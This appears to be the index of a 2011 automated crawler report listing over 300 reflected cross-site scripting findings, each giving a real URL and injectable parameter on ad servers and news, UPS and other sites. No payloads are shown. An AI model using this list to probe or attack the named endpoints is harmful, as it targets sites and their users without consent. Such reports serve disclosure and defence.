DORK Report, Cross Site Scripting, 2-14-2011, XSS, CWE-79, CAPEC-86

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Report generated by CloudScan Vulnerability Crawler at Mon Feb 14 08:58:26 CST 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |

Loading

1. Cross-site scripting (reflected)

1.1. http://a.collective-media.net/ad/cm.dailymail/ron_052010 [REST URL parameter 1]

1.2. http://a.collective-media.net/ad/cm.drudgerep/ [REST URL parameter 1]

1.3. http://a.collective-media.net/adj/cm.dailymail/ron_052010 [REST URL parameter 2]

1.4. http://a.collective-media.net/adj/cm.dailymail/ron_052010 [REST URL parameter 3]

1.5. http://a.collective-media.net/adj/cm.dailymail/ron_052010 [name of an arbitrarily supplied request parameter]

1.6. http://a.collective-media.net/adj/cm.dailymail/ron_052010 [sz parameter]

1.7. http://a.collective-media.net/adj/cm.drudgerep/ [REST URL parameter 2]

1.8. http://a.collective-media.net/adj/cm.drudgerep/ [name of an arbitrarily supplied request parameter]

1.9. http://a.collective-media.net/adj/cm.drudgerep/ [sz parameter]

1.10. http://a.rfihub.com/sed [pa parameter]

1.11. http://ad.doubleclick.net/adi/N3740.270604.B3/B5123509.61 [name of an arbitrarily supplied request parameter]

1.12. http://ad.doubleclick.net/adi/N3740.270604.B3/B5123509.61 [sz parameter]

1.13. http://ad.doubleclick.net/adi/N4270.Media6Degrees.com/B5094437.9 [name of an arbitrarily supplied request parameter]

1.14. http://ad.doubleclick.net/adi/N4270.Media6Degrees.com/B5094437.9 [sz parameter]

1.15. http://ad.doubleclick.net/adi/N4319.msn/B2087123.382 [name of an arbitrarily supplied request parameter]

1.16. http://ad.doubleclick.net/adi/N4319.msn/B2087123.382 [sz parameter]

1.17. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5035359.26 [adurl parameter]

1.18. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5035359.26 [ai parameter]

1.19. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5035359.26 [client parameter]

1.20. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5035359.26 [num parameter]

1.21. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5035359.26 [sig parameter]

1.22. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5035359.26 [sz parameter]

1.23. http://ad.doubleclick.net/adi/interactive.wsj.com/articletools_sponsor [!category parameter]

1.24. http://ad.doubleclick.net/adi/interactive.wsj.com/articletools_sponsor [name of an arbitrarily supplied request parameter]

1.25. http://ad.doubleclick.net/adi/interactive.wsj.com/markets_intelligentinvestor [!category parameter]

1.26. http://ad.doubleclick.net/adi/interactive.wsj.com/markets_intelligentinvestor [name of an arbitrarily supplied request parameter]

1.27. http://ad.doubleclick.net/adi/interactive.wsj.com/personalfinance_newsreel [!category parameter]

1.28. http://ad.doubleclick.net/adi/interactive.wsj.com/personalfinance_newsreel [name of an arbitrarily supplied request parameter]

1.29. http://ad.doubleclick.net/adi/interactive.wsj.com/personalfinance_newsreel [u parameter]

1.30. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [c parameter]

1.31. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [c parameter]

1.32. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [forced_click parameter]

1.33. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [forced_click parameter]

1.34. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [m parameter]

1.35. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [m parameter]

1.36. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [mid parameter]

1.37. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [mid parameter]

1.38. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [sid parameter]

1.39. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [sid parameter]

1.40. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [sz parameter]

1.41. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [sz parameter]

1.42. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [tp parameter]

1.43. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [tp parameter]

1.44. http://ad.doubleclick.net/adj/uk.reuters/news/lifestyle/article [type parameter]

1.45. http://ad.doubleclick.net/adj/wpni.politics/inlinead [ad parameter]

1.46. http://ad.media6degrees.com/adserv/cs [name of an arbitrarily supplied request parameter]

1.47. http://ad.media6degrees.com/adserv/cs [tId parameter]

1.48. http://ad.turn.com/server/pixel.htm [fpid parameter]

1.49. http://ads.adsonar.com/adserving/getAds.jsp [pid parameter]

1.50. http://ads.adsonar.com/adserving/getAds.jsp [placementId parameter]

1.51. http://ads.adsonar.com/adserving/getAds.jsp [ps parameter]

1.52. http://ads.adxpose.com/ads/ads.js [uid parameter]

1.53. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]

1.54. http://ads.specificmedia.com/serve/v=5 [m parameter]

1.55. http://ads.specificmedia.com/serve/v=5 [name of an arbitrarily supplied request parameter]

1.56. http://adserver.adtechus.com/adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH [AdId parameter]

1.57. http://adserver.adtechus.com/adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH [AdId parameter]

1.58. http://adserver.adtechus.com/adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH [REST URL parameter 1]

1.59. http://adserver.adtechus.com/adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH [name of an arbitrarily supplied request parameter]

1.60. http://adserver.adtechus.com/adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH [name of an arbitrarily supplied request parameter]

1.61. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 1]

1.62. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 2]

1.63. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 3]

1.64. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 4]

1.65. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 5]

1.66. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 6]

1.67. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 7]

1.68. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [cookie parameter]

1.69. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [name of an arbitrarily supplied request parameter]

1.70. http://adserving.cpxinteractive.com/st [name of an arbitrarily supplied request parameter]

1.71. http://altfarm.mediaplex.com/ad/js/13966-88527-2151-4 [mpt parameter]

1.72. http://altfarm.mediaplex.com/ad/js/13966-88527-2151-4 [mpvc parameter]

1.73. http://altfarm.mediaplex.com/ad/js/13966-88527-2151-4 [name of an arbitrarily supplied request parameter]

1.74. http://altfarm.mediaplex.com/ad/js/13966-88527-2151-6 [mpt parameter]

1.75. http://altfarm.mediaplex.com/ad/js/13966-88527-2151-6 [mpvc parameter]

1.76. http://altfarm.mediaplex.com/ad/js/13966-88527-2151-6 [name of an arbitrarily supplied request parameter]

1.77. http://api.bizographics.com/v1/profile.json [&callback parameter]

1.78. http://api.bizographics.com/v1/profile.json [api_key parameter]

1.79. http://api.dimestore.com/viapi [id parameter]

1.80. http://api.echoenabled.com/v1/search [q parameter]

1.81. http://api.facebook.com/restserver.php [method parameter]

1.82. http://api.facebook.com/restserver.php [method parameter]

1.83. http://api.facebook.com/restserver.php [query parameter]

1.84. http://api.facebook.com/restserver.php [urls parameter]

1.85. http://api.js-kit.com/v1/count [q parameter]

1.86. http://ar.voicefive.com/b/rc.pli [func parameter]

1.87. http://b.scorecardresearch.com/beacon.js [c1 parameter]

1.88. http://b.scorecardresearch.com/beacon.js [c10 parameter]

1.89. http://b.scorecardresearch.com/beacon.js [c15 parameter]

1.90. http://b.scorecardresearch.com/beacon.js [c2 parameter]

1.91. http://b.scorecardresearch.com/beacon.js [c3 parameter]

1.92. http://b.scorecardresearch.com/beacon.js [c4 parameter]

1.93. http://b.scorecardresearch.com/beacon.js [c5 parameter]

1.94. http://b.scorecardresearch.com/beacon.js [c6 parameter]

1.95. http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90 [REST URL parameter 2]

1.96. http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90 [REST URL parameter 3]

1.97. http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90 [REST URL parameter 4]

1.98. http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90 [REST URL parameter 5]

1.99. http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90 [REST URL parameter 6]

1.100. http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90 [REST URL parameter 7]

1.101. http://b3.mookie1.com/2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90 [REST URL parameter 2]

1.102. http://b3.mookie1.com/2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90 [REST URL parameter 3]

1.103. http://b3.mookie1.com/2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90 [REST URL parameter 4]

1.104. http://b3.mookie1.com/2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90 [REST URL parameter 5]

1.105. http://b3.mookie1.com/2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90 [REST URL parameter 6]

1.106. http://b3.mookie1.com/2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90 [REST URL parameter 7]

1.107. http://bid.openx.net/json [c parameter]

1.108. http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/ [REST URL parameter 1]

1.109. http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/ [REST URL parameter 1]

1.110. http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/ [REST URL parameter 2]

1.111. http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/ [REST URL parameter 2]

1.112. http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/ [name of an arbitrarily supplied request parameter]

1.113. http://blogs.desmoinesregister.com/dmr/wp-content/plugins/audio-player/assets/audio-player.js [REST URL parameter 6]

1.114. http://blogs.desmoinesregister.com/dmr/wp-content/plugins/audio-player/assets/audio-player.js [REST URL parameter 6]

1.115. http://blogs.desmoinesregister.com/dmr/wp-content/plugins/dmr-tweets/jquery.tweet.js [REST URL parameter 5]

1.116. http://blogs.desmoinesregister.com/dmr/wp-content/plugins/dmr-tweets/jquery.tweet.js [REST URL parameter 5]

1.117. http://blogs.desmoinesregister.com/dmr/wp-content/plugins/nextgen-gallery/css/nggallery.css [REST URL parameter 6]

1.118. http://blogs.desmoinesregister.com/dmr/wp-content/plugins/nextgen-gallery/css/nggallery.css [REST URL parameter 6]

1.119. http://blogs.desmoinesregister.com/dmr/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.css [REST URL parameter 6]

1.120. http://blogs.desmoinesregister.com/dmr/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.css [REST URL parameter 6]

1.121. http://blogs.desmoinesregister.com/dmr/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.js [REST URL parameter 6]

1.122. http://blogs.desmoinesregister.com/dmr/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.js [REST URL parameter 6]

1.123. http://blogs.desmoinesregister.com/dmr/wp-content/plugins/wp-email/email-css.css [REST URL parameter 5]

1.124. http://blogs.desmoinesregister.com/dmr/wp-content/plugins/wp-email/email-css.css [REST URL parameter 5]

1.125. http://blogs.desmoinesregister.com/odygel/lib/legacy/GDN/UAWidgets/LoggedOut.js [REST URL parameter 6]

1.126. http://blogs.desmoinesregister.com/odygel/lib/legacy/GDN/UAWidgets/LoggedOut.js [REST URL parameter 6]

1.127. http://blogs.desmoinesregister.com/odygel/lib/userauth/content/login.html [REST URL parameter 5]

1.128. http://blogs.desmoinesregister.com/odygel/lib/userauth/content/login.html [REST URL parameter 5]

1.129. http://blogs.desmoinesregister.com/odygel/lib/userauth/content/signup.html [REST URL parameter 5]

1.130. http://blogs.desmoinesregister.com/odygel/lib/userauth/content/signup.html [REST URL parameter 5]

1.131. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [$ parameter]

1.132. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [$ parameter]

1.133. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [l parameter]

1.134. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [q parameter]

1.135. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [q parameter]

1.136. http://cache.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp [adRotationId parameter]

1.137. http://cache.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp [bannerCreativeAdModuleId parameter]

1.138. http://cache.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp [campaignId parameter]

1.139. http://cache.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp [campaignId parameter]

1.140. http://cache.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp [siteId parameter]

1.141. http://cache.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp [siteId parameter]

1.142. http://cache.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp [syndicationOutletId parameter]

1.143. http://cache.vindicosuite.com/xumo/libs/vindicosuite/xumoJS/prod/vindicosuite.xumo.js.asp [coad parameter]

1.144. http://creativeby2.unicast.com/dynamic.js [pid parameter]

1.145. http://creativeby2.unicast.com/dynamic.js [vnam parameter]

1.146. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [$ parameter]

1.147. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [$ parameter]

1.148. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [$ parameter]

1.149. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [$ parameter]

1.150. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [name of an arbitrarily supplied request parameter]

1.151. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [q parameter]

1.152. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [q parameter]

1.153. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [q parameter]

1.154. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [q parameter]

1.155. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js [$ parameter]

1.156. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js [$ parameter]

1.157. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js [name of an arbitrarily supplied request parameter]

1.158. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js [q parameter]

1.159. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js [q parameter]

1.160. http://dev.inskinmedia.com/trackports/rep/base/track.php [callback parameter]

1.161. http://dev.inskinmedia.com/trackports/rep/base/track.php [type parameter]

1.162. http://dm.de.mookie1.com/2/B3DM/2010DM/11355486136@x23 [REST URL parameter 2]

1.163. http://dm.de.mookie1.com/2/B3DM/2010DM/11355486136@x23 [REST URL parameter 3]

1.164. http://dm.de.mookie1.com/2/B3DM/2010DM/11355486136@x23 [REST URL parameter 4]

1.165. http://dm.de.mookie1.com/2/B3DM/2010DM/11473307965@x23 [REST URL parameter 2]

1.166. http://dm.de.mookie1.com/2/B3DM/2010DM/11473307965@x23 [REST URL parameter 3]

1.167. http://dm.de.mookie1.com/2/B3DM/2010DM/11473307965@x23 [REST URL parameter 4]

1.168. http://dm.de.mookie1.com/2/B3DM/2010DM/11781759243@x23 [REST URL parameter 2]

1.169. http://dm.de.mookie1.com/2/B3DM/2010DM/11781759243@x23 [REST URL parameter 3]

1.170. http://dm.de.mookie1.com/2/B3DM/2010DM/11781759243@x23 [REST URL parameter 4]

1.171. http://ebay.adnxs.com/ttj [pt1 parameter]

1.172. http://ebay.adnxs.com/ttj [pt2 parameter]

1.173. http://ebay.adnxs.com/ttj [pt3 parameter]

1.174. http://ev.ib-ibi.com/pibiview.js [xid parameter]

1.175. http://event.adxpose.com/event.flow [uid parameter]

1.176. http://ib.adnxs.com/ab [cnd parameter]

1.177. http://ib.adnxs.com/ab [custom_macro parameter]

1.178. http://ib.adnxs.com/ptj [redir parameter]

1.179. http://img.mediaplex.com/content/0/14302/119028/OLE_results_band_180x150.js [mpck parameter]

1.180. http://img.mediaplex.com/content/0/14302/119028/OLE_results_band_180x150.js [mpvc parameter]

1.181. http://img.mediaplex.com/content/0/14302/119028/OLE_results_band_180x150.js [placementid parameter]

1.182. http://img.mediaplex.com/content/0/711/118167/80115_eBay_Q4_2010_Liquid_Gabi2_180x150.js [mpck parameter]

1.183. http://img.mediaplex.com/content/0/711/118167/80115_eBay_Q4_2010_Liquid_Gabi2_180x150.js [mpvc parameter]

1.184. http://img.mediaplex.com/content/0/711/118167/81330_eBay_2011_Q1_Collage_Wall_LastCat_728x90.html [mpck parameter]

1.185. http://img.mediaplex.com/content/0/711/118167/81330_eBay_2011_Q1_Collage_Wall_LastCat_728x90.html [mpck parameter]

1.186. http://img.mediaplex.com/content/0/711/118167/81330_eBay_2011_Q1_Collage_Wall_LastCat_728x90.html [mpvc parameter]

1.187. http://img.mediaplex.com/content/0/711/118167/81330_eBay_2011_Q1_Collage_Wall_LastCat_728x90.html [mpvc parameter]

1.188. http://js.revsci.net/gateway/gw.js [csid parameter]

1.189. http://js.uk.reuters.com/recommend/re/re [callback parameter]

1.190. http://k.collective-media.net/cmadj/cm.dailymail/ron_052010 [REST URL parameter 2]

1.191. http://k.collective-media.net/cmadj/cm.drudgerep/ [REST URL parameter 2]

1.192. http://kona5.kontera.com/KonaGet.js [l parameter]

1.193. http://kona5.kontera.com/KonaGet.js [rId parameter]

1.194. http://mads.cbsnews.com/mac-ad [&adfile parameter]

1.195. http://mads.cbsnews.com/mac-ad [ADREQ&SP parameter]

1.196. http://mads.cbsnews.com/mac-ad [ADREQ&beacon parameter]

1.197. http://mads.cbsnews.com/mac-ad [BRAND parameter]

1.198. http://mads.cbsnews.com/mac-ad [BRAND parameter]

1.199. http://mads.cbsnews.com/mac-ad [CELT parameter]

1.200. http://mads.cbsnews.com/mac-ad [CID parameter]

1.201. http://mads.cbsnews.com/mac-ad [DVAR_INSTLANG parameter]

1.202. http://mads.cbsnews.com/mac-ad [GLOBAL&CLIENT:ID parameter]

1.203. http://mads.cbsnews.com/mac-ad [GLOBAL&CLIENT:ID parameter]

1.204. http://mads.cbsnews.com/mac-ad [NCAT parameter]

1.205. http://mads.cbsnews.com/mac-ad [NODE parameter]

1.206. http://mads.cbsnews.com/mac-ad [PAGESTATE parameter]

1.207. http://mads.cbsnews.com/mac-ad [PAGESTATE parameter]

1.208. http://mads.cbsnews.com/mac-ad [POS parameter]

1.209. http://mads.cbsnews.com/mac-ad [PTYPE parameter]

1.210. http://mads.cbsnews.com/mac-ad [SITE parameter]

1.211. http://mads.cbsnews.com/mac-ad [SITE parameter]

1.212. http://mads.cbsnews.com/mac-ad [cookiesOn parameter]

1.213. http://mads.cbsnews.com/mac-ad [name of an arbitrarily supplied request parameter]

1.214. http://mads.cbsnews.com/mac-ad [x-cb parameter]

1.215. http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech [REST URL parameter 1]

1.216. http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech [REST URL parameter 2]

1.217. http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech [REST URL parameter 3]

1.218. http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech [REST URL parameter 4]

1.219. http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech [REST URL parameter 5]

1.220. http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech [REST URL parameter 6]

1.221. http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech [REST URL parameter 7]

1.222. http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech [alias parameter]

1.223. http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech [name of an arbitrarily supplied request parameter]

1.224. http://media2.legacy.com/adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech [REST URL parameter 1]

1.225. http://media2.legacy.com/adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech [REST URL parameter 2]

1.226. http://media2.legacy.com/adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech [REST URL parameter 3]

1.227. http://media2.legacy.com/adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech [REST URL parameter 4]

1.228. http://media2.legacy.com/adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech [REST URL parameter 5]

1.229. http://media2.legacy.com/adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech [REST URL parameter 6]

1.230. http://media2.legacy.com/adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech [REST URL parameter 7]

1.231. http://media2.legacy.com/adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech [alias parameter]

1.232. http://media2.legacy.com/adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech [name of an arbitrarily supplied request parameter]

1.233. http://odb.outbrain.com/utils/get [callback parameter]

1.234. http://offers-service.cbsinteractive.com/offers/script.sc [offerId parameter]

1.235. http://oscar.wapolabs.com/RevenuePlatform/ad/generate [&callback parameter]

1.236. http://oscar.wapolabs.com/RevenuePlatform/ad/generate [assocId parameter]

1.237. http://oscar.wapolabs.com/RevenuePlatform/ad/generate [commercialNode parameter]

1.238. http://oscar.wapolabs.com/RevenuePlatform/ad/generate [container parameter]

1.239. http://oscar.wapolabs.com/RevenuePlatform/ad/generate [contentId parameter]

1.240. http://oscar.wapolabs.com/RevenuePlatform/ad/generate [divClass parameter]

1.241. http://oscar.wapolabs.com/RevenuePlatform/ad/generate [height parameter]

1.242. http://oscar.wapolabs.com/RevenuePlatform/ad/generate [keywords parameter]

1.243. http://oscar.wapolabs.com/RevenuePlatform/ad/generate [url parameter]

1.244. http://oscar.wapolabs.com/RevenuePlatform/ad/generate [width parameter]

1.245. http://pandora.cnet.com/api/rest/ddaImageHandler/index.php [fieldNum parameter]

1.246. http://pixel.invitemedia.com/admeld_sync [admeld_callback parameter]

1.247. http://pixel.invitemedia.com/rubicon_sync [publisher_redirecturl parameter]

1.248. http://r.turn.com/server/pixel.htm [fpid parameter]

1.249. http://r.turn.com/server/pixel.htm [sp parameter]

1.250. http://sitelife.desmoinesregister.com/ver1.0/sys/jsonp.app [cb parameter]

1.251. http://sitelife.desmoinesregister.com/ver1.0/sys/jsonp.app [plckcommentonkey parameter]

1.252. http://sitelife.desmoinesregister.com/ver1.0/sys/jsonp.app [plckcommentonkeytype parameter]

1.253. http://sitelife.desmoinesregister.com/ver1.0/sys/jsonp.app [plckitemsperpage parameter]

1.254. http://syndicated.mondominishows.com/custom/vertical600iframe.php [name of an arbitrarily supplied request parameter]

1.255. http://syndicated.mondominishows.com/custom/vertical600iframe.php [pr parameter]

1.256. http://syndicated.mondominishows.com/custom/vertical600iframe.php [pubsite_id parameter]

1.257. http://tag.contextweb.com/TagPublish/getjs.aspx [action parameter]

1.258. http://tag.contextweb.com/TagPublish/getjs.aspx [cwadformat parameter]

1.259. http://tag.contextweb.com/TagPublish/getjs.aspx [cwheight parameter]

1.260. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpid parameter]

1.261. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpnet parameter]

1.262. http://tag.contextweb.com/TagPublish/getjs.aspx [cwrun parameter]

1.263. http://tag.contextweb.com/TagPublish/getjs.aspx [cwtagid parameter]

1.264. http://tag.contextweb.com/TagPublish/getjs.aspx [cwwidth parameter]

1.265. http://tap.rubiconproject.com/partner/agent/rubicon/channels.js [cb parameter]

1.266. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [adRotationId parameter]

1.267. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [bannerCreativeAdModuleId parameter]

1.268. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [campaignId parameter]

1.269. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [siteId parameter]

1.270. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [syndicationOutletId parameter]

1.271. http://uk.reuters.com/assets/commentsChild [articleId parameter]

1.272. http://uk.reuters.com/assets/commentsChild [channel parameter]

1.273. http://uk.reuters.com/assets/sharedModuleJS [callback parameter]

1.274. http://uk.reuters.com/assets/sharedModuleJS [sp parameter]

1.275. http://uk.reuters.com/assets/sharedModuleJS [sp parameter]

1.276. http://uk.reuters.com/tracker/guid [cb parameter]

1.277. http://web.adblade.com/imps.php [description_color parameter]

1.278. http://web.adblade.com/imps.php [img_pad parameter]

1.279. http://web.adblade.com/imps.php [title_color parameter]

1.280. http://widgets.digg.com/buttons/count [url parameter]

1.281. http://www.dianomioffers.co.uk/smartads.epl [id parameter]

1.282. http://www.legacy.com/legacies/2011/obituary-photo-gallery.aspx [photo parameter]

1.283. http://www.nola.com/cgi-bin/donotcount/formatp.cgi/dhtml/jspop/jspop.ata [EXP parameter]

1.284. http://www.nola.com/cgi-bin/donotcount/formatp.cgi/dhtml/jspop/jspop.ata [NAME parameter]

1.285. http://www.ups.com/bussol [WT.svl parameter]

1.286. http://www.ups.com/bussol [actionID parameter]

1.287. http://www.ups.com/bussol [actionID parameter]

1.288. http://www.ups.com/bussol [contentID parameter]

1.289. http://www.ups.com/bussol [contentID parameter]

1.290. http://www.ups.com/bussol [loc parameter]

1.291. http://www.ups.com/bussol [loc parameter]

1.292. http://www.ups.com/bussol [name of an arbitrarily supplied request parameter]

1.293. http://www.ups.com/bussol [name of an arbitrarily supplied request parameter]

1.294. http://www.ups.com/bussol [viewID parameter]

1.295. http://www.ups.com/bussol [viewID parameter]

1.296. http://www.ups.com/bussol/ [WT.svl parameter]

1.297. http://www.ups.com/bussol/ [loc parameter]

1.298. http://www.ups.com/bussol/ [loc parameter]

1.299. http://www.ups.com/bussol/ [name of an arbitrarily supplied request parameter]

1.300. http://www.ups.com/bussol/ [name of an arbitrarily supplied request parameter]

1.301. http://www.ups.com/bussol/ [viewID parameter]

1.302. http://www.ups.com/bussol/ [viewID parameter]

1.303. http://www.ups.com/content/global/index.jsx [REST URL parameter 2]

1.304. http://www.ups.com/content/us/en/about/index.html [REST URL parameter 2]

1.305. http://www.ups.com/content/us/en/about/index.html [REST URL parameter 3]

1.306. http://www.ups.com/content/us/en/about/news/service_updates/20091007_batteries.html [REST URL parameter 2]

1.307. http://www.ups.com/content/us/en/about/news/service_updates/20091007_batteries.html [REST URL parameter 3]

1.308. http://www.ups.com/content/us/en/about/news/service_updates/20100120_on_call.html [REST URL parameter 2]

1.309. http://www.ups.com/content/us/en/about/news/service_updates/20100120_on_call.html [REST URL parameter 3]

1.310. http://www.ups.com/content/us/en/about/news/service_updates/20100624_fraud.html [REST URL parameter 2]

1.311. http://www.ups.com/content/us/en/about/news/service_updates/20100624_fraud.html [REST URL parameter 3]

1.312. http://www.ups.com/content/us/en/about/news/service_updates/20101102_investigation.html [REST URL parameter 2]

1.313. http://www.ups.com/content/us/en/about/news/service_updates/20101102_investigation.html [REST URL parameter 3]

1.314. http://www.ups.com/content/us/en/about/news/service_updates/20101102_toner.html [REST URL parameter 2]

1.315. http://www.ups.com/content/us/en/about/news/service_updates/20101102_toner.html [REST URL parameter 3]

1.316. http://www.ups.com/content/us/en/about/news/service_updates/20101217_imp_cntrl.html [REST URL parameter 2]

1.317. http://www.ups.com/content/us/en/about/news/service_updates/20101217_imp_cntrl.html [REST URL parameter 3]

1.318. http://www.ups.com/content/us/en/about/news/service_updates/retail_requirement.html [REST URL parameter 2]

1.319. http://www.ups.com/content/us/en/about/news/service_updates/retail_requirement.html [REST URL parameter 3]

1.320. http://www.ups.com/content/us/en/about/sites.html [REST URL parameter 2]

1.321. http://www.ups.com/content/us/en/about/sites.html [REST URL parameter 3]

1.322. http://www.ups.com/content/us/en/contact/index.html [REST URL parameter 2]

1.323. http://www.ups.com/content/us/en/contact/index.html [REST URL parameter 3]

1.324. http://www.ups.com/content/us/en/freight/air_freight.html [REST URL parameter 2]

